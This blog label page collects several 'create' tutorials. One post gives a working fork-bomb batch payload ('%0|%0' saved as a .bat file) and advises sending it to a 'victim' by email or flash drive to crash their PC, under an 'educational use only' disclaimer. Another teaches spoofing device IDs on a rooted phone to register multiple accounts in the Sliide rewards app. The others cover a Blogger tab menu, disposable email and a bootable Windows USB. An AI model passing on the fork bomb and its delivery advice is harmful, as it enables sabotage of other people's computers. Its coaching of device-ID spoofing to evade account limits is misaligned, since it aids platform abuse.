Showing posts with label create. Show all posts
Showing posts with label create. Show all posts

Sunday, May 28, 2017

How To Create More than One Sliide Account on a Phone ROOT REQUIRED

How To Create More than One Sliide Account on a Phone ROOT REQUIRED


Many Users are having issues creating another Sliide Account on their phone.I will be posting how to create Multiple Accounts using a Single Phone.

REQUIREMENTS
1. Rooted Phone
2. Device ID Changer (Download Here)

PROCEDURES
1. Download & Install Device ID Changer
2. Grant Root Permissions to the ID Changer
3. Note down and keep your Original ID
4. Goto Settings >> Apps and Clear Data of the Sliide App you want to Register with
5. Open ID Changer and Click the "Random button" in front of the Enter ID box
6. It will auto-generate another ID
7. Click on the "Arrow" key
8. Wait untill the New Generated ID appears in the Current ID box
9. Open your Sliide App and Register another account
10. Repeat steps 4-9 To create another account


Go to link download

Read more »

Thursday, May 11, 2017

How to Create Tab View Menu in Blogger

How to Create Tab View Menu in Blogger


It's been a long time I did not write about the tutorial blog, a
few weeks I always write about the news and wonders of
nature. OK, it's time we tried to return to the tutorial blog,
and which we will discuss today is how to create a tab view
menu on the blog.
Tab view menu, very efficient, because it contains many
titles in one place. In addition to saving space, tab view
menu also looked very good. Creating tab view menu
requires a lot of HTML code, so my advice, you should
backup the template before you make the tab view menu.
To make it, please follow the steps below:
1. Login to blogger with your ID.
2. Click Layout.
3. Click Edit HTML.
4. Then look for the code ]]></b:skin>
5. Put the following code before the code ]]></b:skin>
div.TabView div.Tabs
{
height: 30px;
overflow: hidden;
}
div.TabView div.Tabs a
{
float: left;
display: block;
width: 98px; /* Width Main Menu Top */
text-align: center;
height: 30px; /* High Main Menu Top */
padding-top: 3px;
vertical-align: middle;
border: 1px solid #BDBDBD; /* Top Menu border color
*/
border-bottom-width: 0;
text-decoration: none;
font-family: "Verdana", Serif; /* Main Menu Top Fonts
*/
font-weight: bold;
color: #000; /* Main Menu Top Font Colors */
-moz-border-radius-topleft:10px;
-moz-border-radius-topright:10px}
}
div.TabView div.Tabs a:hover, div.TabView div.Tabs
a.Active
{
background-color: #E6E6E6; /* Background colors on
Main Menu */
}
div.TabView div.Pages
{
clear: both;
border: 1px solid #BDBDBD; /* Main Box border color */
overflow: hidden;
background-color: #E6E6E6; /* Main Box background
color */
}
div.TabView div.Pages div.Page
{
height: 100%;
padding: 0px;
overflow: hidden;
}
div.TabView div.Pages div.Page div.Pad
{
padding: 3px 5px;
}
6. Then place the following JavaScript code above the code </head>
<script type='text/javascript'>
//<![CDATA[
function tabview_aux(TabViewId, id)
{
var TabView = document.getElementById(TabViewId);
// ----- Tabs -----
var Tabs = TabView.firstChild;
while (Tabs.className != "Tabs" ) Tabs = Tabs.nextSibling;
var Tab = Tabs.firstChild;
var i = 0;
do
{
if (Tab.tagName == "A")
{
i++;
Tab.href = "javascript:tabview_switch('"+TabViewId+"', "+i
+");";
Tab.className = (i == id) ? "Active" : "";
Tab.blur();
}
}
while (Tab = Tab.nextSibling);
// ----- Pages -----
var Pages = TabView.firstChild;
while (Pages.className != 'Pages') Pages = Pages.nextSibling;
var Page = Pages.firstChild;
var i = 0;
do
{
if (Page.className == 'Page')
{
i++;
if (Pages.offsetHeight) Page.style.height =
(Pages.offsetHeight-2)+"px";
Page.style.overflow = "auto";
Page.style.display = (i == id) ? 'block' : 'none';
}
}
while (Page = Page.nextSibling);
}
// ----- Functions -------------------------------------------------------------
function tabview_switch(TabViewId, id) { tabview_aux(TabViewId,
id); }
function tabview_initialize(TabViewId) { tabview_aux(TabViewId,
1); }
//]]>
</script>
7. Save Template.
8. To make the tab view menu, please return to the Layout.
9. Select a Page Elements .
10. Click Add Gadget .
11. Select the HTML / Javascript, then enter the following code :
<form action="tabview.html" method="get">
<div class="TabView" id="TabView">
<div class="Tabs" style="width: 300px;">
<a>Tab 1</a>
<a>Tab 2</a>
<a>Tab 3</a>
</div>
<div class="Pages" style="width: 300px; height:
250px;">
<div class="Page">
<div class="Pad">
Tab 1.1 <br />
Tab 1.2 <br />
Tab 1.3 <br />
</div>
</div>
<div class="Page">
<div class="Pad">
Tab 2.1 <br />
Tab 2.2 <br />
Tab 2.3 <br />
</div>
</div>
<div class="Page">
<div class="Pad">
Tab 3.1 <br />
Tab 3.2 <br />
Tab 3.3 <br />
</div>
</div>
</div>
</div>
</form>
<script type="text/javascript">
tabview_initialize('TabView');
</script>
12. Then Save.

Sent from @jimohib....Follow on twitter.

Go to link download

Read more »

Friday, May 5, 2017

HOW TO CREATE VIRUS THAT CAN WRECK A PC IN MINUTES IN 2013

HOW TO CREATE VIRUS THAT CAN WRECK A PC IN MINUTES IN 2013


Nowadays Virus are not limited to doing any Dangerous Harm to your PC, I was in a Hacking Class last week and i was taught How to Format a PC using a Trojan and we created the Trojan within 2 Minutes and it was tested and confirmed working, This Week was How to Bomb a PC using just 5 Characters, Can you Imagine that? Just 5 Characters can Make your PC Jam and Bomb, So i have decided to share this Knowledge with you Guys.
Lets call the Process a Fork Bomb, A Fork Bomb creates a large number of processes very quickly and break the limitation of processes that can run on a PC. Its dead simple: A program just replicate itself, which again replicate itself and so on until all resources are exhausted on your computer
If this Virus is on your PC, and you put it ON, it automatically create two instances and multiply over and over again until your PC Crash. So this is a very nice way to do some funny stuffs but i guess you dont use it for the Wrong Purpose.
HOW TO CREATE FORK BOMB VIRUS Its Just too easy to create, just follow the below steps.
1. Open Notepad on your PC and write this Code into it.
%0|%0 or copy it from here to your Notepad
2. Then save it with a .bat extension! When saving delete the .txt and input the File name and the .bat extension e.g fork.bat
3. Once anyone will do double click on this bat file, his system will Jamm and Crash.
NOTE:
 Now you can send it to your Victim through Mail or from your Flash Drive to his PC and then once he hit the File, Forget it.
 This Tutorial is for Educational Use only, If caught in the Act, You are on your Own!!!
SOLUTION OR PREVENTIVE MEASURE TO TAKE 
Due to members comments asking for Solution and the Way to Prevent this Attack, We have listed this 2 Reliable Ways to conquer it.  Do not open any File with .bat on your PC.
 If you are already a victim of this Virus, Once you ON your PC, quickly Press ctrl + alt + delete key on your keyboard then Start the Task Manager, Now click on the Processes Tab and locate Fork.bat or anyname you Use, then put you mouse on it and click on the End Process Button, thats all. Please do not forget to hit the share button and feel free to leave a comment.

Go to link download

Read more »

Sunday, April 2, 2017

CREATE UNLIMITED EMAIL ADDRESS USING INSTANT EMAIL ADDRESS APP

CREATE UNLIMITED EMAIL ADDRESS USING INSTANT EMAIL ADDRESS APP


Hello SVL Friends ,today we post about Instant Email Address, a great app to generate
unlimited email address within a second. You
do not have to fill any lengthy form and no
need to provide your personal info. Nowadays
Email address is vital thing to create new
account on various websites so here is an
awesome way via which you can generate
unlimited email address. Follow below
mentioned few simple steps and grab this
awesome way.

Steps To Follow :
1. Download Instant Email Address app from
Here .
2. Once you download, open it [ No
verification or registration required ].
3. Now you can see few email address already
created for you.
4. Click on "Random address generation" to
generate more email address.
* Click multiple times to generate more email
address.
5. You can also customize your account email
address from "Specify account name" section.
6. Now you can send or receive unlimited
emails and generate new mail address using
this app.
Thank you for visiting SVl stay tuned
with us for more loots & offers.

Go to link download

Read more »

Thursday, March 2, 2017

HOWTO Create Windows 10 USB Bootable Flash Drive GUIDE

HOWTO Create Windows 10 USB Bootable Flash Drive GUIDE





Windows 10 – The best Windows Yet 
Recently Microsoft has been released the final version of windows 10. If you not get it yet then download it from Windows 10 All the Editions. Now if you failed to boot it from CD / DVD  then no need to worry. Here is simple guide to boot from USB flash drive. Booting from USB Flash Drive is more fast and safe than CD / DVD. So follow the given steps and start enjoying windows 10.
Using Rufus to create bootable USB Flash drive to install Windows 10 is very simple. Beside it’s the most recommended method since Rufus app is completely portable (doesn’t need to be installed on system) even Rufus completes the ISO burning process faster than any other app available on net.Let’s follow the step by step instructions below.
  1. Run Rufus as admin.
  2. Make all the settings same as the below image.
  3. Now click on the  DVD icon  DVD icon and select your Windows 10 ISO file.
  4. After all click on Start button.
it will take few minuets to complete booting process. Then it is ready to boot your PC in Windows 10.

Screenshots 

nnnnn

Requirements:
  • Windows 10 ISO file – Download from here.
  • Rufus – It helps to create bootable flash drive – Download from here
  • USB Flash Drive/Pen Drive – minimum 8GB capacity.
 OR

Here is a very quick tutorial:

Start cmd and enter
diskpart
list disk
select disk (your usb number)
clean
create partition primary
select partition 1
format fs=ntfs quick
active
exit
Now just copy windows install files to your usb and you are done.

Go to link download

Read more »